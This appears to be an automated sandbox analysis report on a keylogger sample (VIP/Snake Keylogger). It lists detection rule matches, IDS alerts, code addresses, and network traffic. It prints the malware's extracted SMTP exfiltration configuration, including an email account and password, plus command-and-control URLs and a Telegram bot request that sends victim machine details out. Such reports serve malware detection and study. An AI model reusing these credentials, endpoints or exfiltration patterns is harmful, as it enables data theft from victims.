Source: http://aborters.duckdns.org:8081 |
URL Reputation: Label: malware |
Source: http://anotherarmy.dns.army:8081 |
URL Reputation: Label: malware |
Source: 0.0.z64BLPL.exe.690000.0.unpack |
Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "manoj@electradubai.com", "Password": "LordHaveMercy!!123", "Host": "mail.electradubai.com", "Port": "25", "Version": "4.4"} |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 00D3F2D5h |
0_2_00D3F138 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 00D3F2D5h |
0_2_00D3F324 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 00D3FA91h |
0_2_00D3F7EC |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 06693360h |
0_2_06692F48 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 06690D0Dh |
0_2_06690B30 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 06691697h |
0_2_06690B30 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 06692C21h |
0_2_06692970 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 0669D0C9h |
0_2_0669CE20 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 0669D979h |
0_2_0669D6D0 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 06693360h |
0_2_06692F37 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 0669E229h |
0_2_0669DF80 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 0669EF31h |
0_2_0669EC88 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 0669F7E1h |
0_2_0669F538 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 0669D521h |
0_2_0669D278 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 06693360h |
0_2_0669328E |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 0669DDD1h |
0_2_0669DB28 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 0669E681h |
0_2_0669E3D8 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h |
0_2_06690040 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 0669EAD9h |
0_2_0669E830 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 0669F389h |
0_2_0669F0E0 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 4x nop then jmp 0669FC39h |
0_2_0669F990 |
Source: Yara match |
File source: z64BLPL.exe, type: SAMPLE |
Source: Yara match |
File source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2029/09/2024%20/%2005:52:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive |
Source: Joe Sandbox View |
IP Address: 149.154.167.220 149.154.167.220 |
Source: Joe Sandbox View |
IP Address: 188.114.97.3 188.114.97.3 |
Source: Joe Sandbox View |
IP Address: 188.114.97.3 188.114.97.3 |
Source: Joe Sandbox View |
IP Address: 193.122.6.168 193.122.6.168 |
Source: Joe Sandbox View |
ASN Name: TELEGRAMRU TELEGRAMRU |
Source: Joe Sandbox View |
ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS |
Source: Joe Sandbox View |
ASN Name: CNSV-LLCUS CNSV-LLCUS |
Source: Network traffic |
Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49742 -> 193.122.6.168:80 |
Source: Network traffic |
Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 193.122.6.168:80 |
Source: Network traffic |
Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49748 -> 193.122.6.168:80 |
Source: Network traffic |
Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49750 -> 193.122.6.168:80 |
Source: Network traffic |
Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49740 -> 193.122.6.168:80 |
Source: Network traffic |
Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 193.122.6.168:80 |
Source: Network traffic |
Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49744 -> 193.122.6.168:80 |
Source: Network traffic |
Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49746 -> 193.122.6.168:80 |
Source: Network traffic |
Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49732 -> 188.114.97.3:443 |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2029/09/2024%20/%2005:52:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
DNS traffic detected: DNS query: checkip.dyndns.org |
Source: global traffic |
DNS traffic detected: DNS query: reallyfreegeoip.org |
Source: global traffic |
DNS traffic detected: DNS query: api.telegram.org |
Source: global traffic |
DNS traffic detected: DNS query: mail.electradubai.com |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 26 Sep 2024 15:10:46 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection |
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://51.38.247.67:8081/_send_.php?L |
Source: z64BLPL.exe |
String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded |
Source: z64BLPL.exe |
String found in binary or memory: http://aborters.duckdns.org:8081 |
Source: z64BLPL.exe |
String found in binary or memory: http://anotherarmy.dns.army:8081 |
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002A11000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://checkip.dyndns.org |
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002A11000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://checkip.dyndns.org/ |
Source: z64BLPL.exe |
String found in binary or memory: http://checkip.dyndns.org/q |
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002BA3000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://mail.electradubai.com |
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002A11000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: z64BLPL.exe |
String found in binary or memory: http://varders.kozow.com:8081 |
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org |
Source: z64BLPL.exe |
String found in binary or memory: https://api.telegram.org/bot |
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text= |
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20a |
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002BD5000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002C06000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://chrome.google.com/webstore?hl=en |
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://chrome.google.com/webstore?hl=enlB |
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002A60000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://reallyfreegeoip.org |
Source: z64BLPL.exe |
String found in binary or memory: https://reallyfreegeoip.org/xml/ |
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002A60000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33 |
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002A8B000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$ |
Source: z64BLPL.exe, 00000000.00000002.4122665440.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B64000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C93000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003DB6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 |
Source: z64BLPL.exe, 00000000.00000002.4122665440.0000000003AF5000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003D92000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B3F000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples |
Source: z64BLPL.exe, 00000000.00000002.4122665440.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B64000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C93000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003DB6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 |
Source: z64BLPL.exe, 00000000.00000002.4122665440.0000000003AF5000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003D92000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B3F000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install |
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002C06000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.office.com/ |
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002C01000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.office.com/lB |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49732 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49743 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49731 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49731 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49732 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49741 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49752 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49751 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49741 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49743 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49749 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49747 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49745 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49751 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49752 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49749 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49747 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49745 |
Source: z64BLPL.exe, type: SAMPLE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: z64BLPL.exe, type: SAMPLE |
Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: z64BLPL.exe, type: SAMPLE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE |
Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: Process Memory Space: z64BLPL.exe PID: 7268, type: MEMORYSTR |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00BFC571 |
0_2_00BFC571 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00BF268C |
0_2_00BF268C |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00BF5708 |
0_2_00BF5708 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00D3A088 |
0_2_00D3A088 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00D3C146 |
0_2_00D3C146 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00D37118 |
0_2_00D37118 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00D3D2CB |
0_2_00D3D2CB |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00D35362 |
0_2_00D35362 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00D3C468 |
0_2_00D3C468 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00D3D599 |
0_2_00D3D599 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00D3C738 |
0_2_00D3C738 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00D369A0 |
0_2_00D369A0 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00D3EAA8 |
0_2_00D3EAA8 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00D3FC37 |
0_2_00D3FC37 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00D3CD28 |
0_2_00D3CD28 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00D3CFF7 |
0_2_00D3CFF7 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00D3F7EC |
0_2_00D3F7EC |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00D339ED |
0_2_00D339ED |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00D329EC |
0_2_00D329EC |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00D3EA9B |
0_2_00D3EA9B |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00D33AA1 |
0_2_00D33AA1 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_00D33E09 |
0_2_00D33E09 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_066996C8 |
0_2_066996C8 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_06699DF0 |
0_2_06699DF0 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_06692288 |
0_2_06692288 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_06690B30 |
0_2_06690B30 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_06691BA8 |
0_2_06691BA8 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_06692970 |
0_2_06692970 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_066951A8 |
0_2_066951A8 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669CE20 |
0_2_0669CE20 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669CE0F |
0_2_0669CE0F |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669D6C0 |
0_2_0669D6C0 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669D6D0 |
0_2_0669D6D0 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669DF7F |
0_2_0669DF7F |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669DF80 |
0_2_0669DF80 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669EC78 |
0_2_0669EC78 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_066994A8 |
0_2_066994A8 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669EC88 |
0_2_0669EC88 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669F528 |
0_2_0669F528 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_06698D20 |
0_2_06698D20 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669F538 |
0_2_0669F538 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_06698D11 |
0_2_06698D11 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_06699D89 |
0_2_06699D89 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669D278 |
0_2_0669D278 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_06692278 |
0_2_06692278 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669DB28 |
0_2_0669DB28 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_06690B20 |
0_2_06690B20 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669DB19 |
0_2_0669DB19 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669E3CA |
0_2_0669E3CA |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669E3D8 |
0_2_0669E3D8 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_06691B97 |
0_2_06691B97 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_06690040 |
0_2_06690040 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669E82F |
0_2_0669E82F |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669E830 |
0_2_0669E830 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_06690006 |
0_2_06690006 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669F0E0 |
0_2_0669F0E0 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669F0D1 |
0_2_0669F0D1 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669F982 |
0_2_0669F982 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_06695198 |
0_2_06695198 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Code function: 0_2_0669F990 |
0_2_0669F990 |
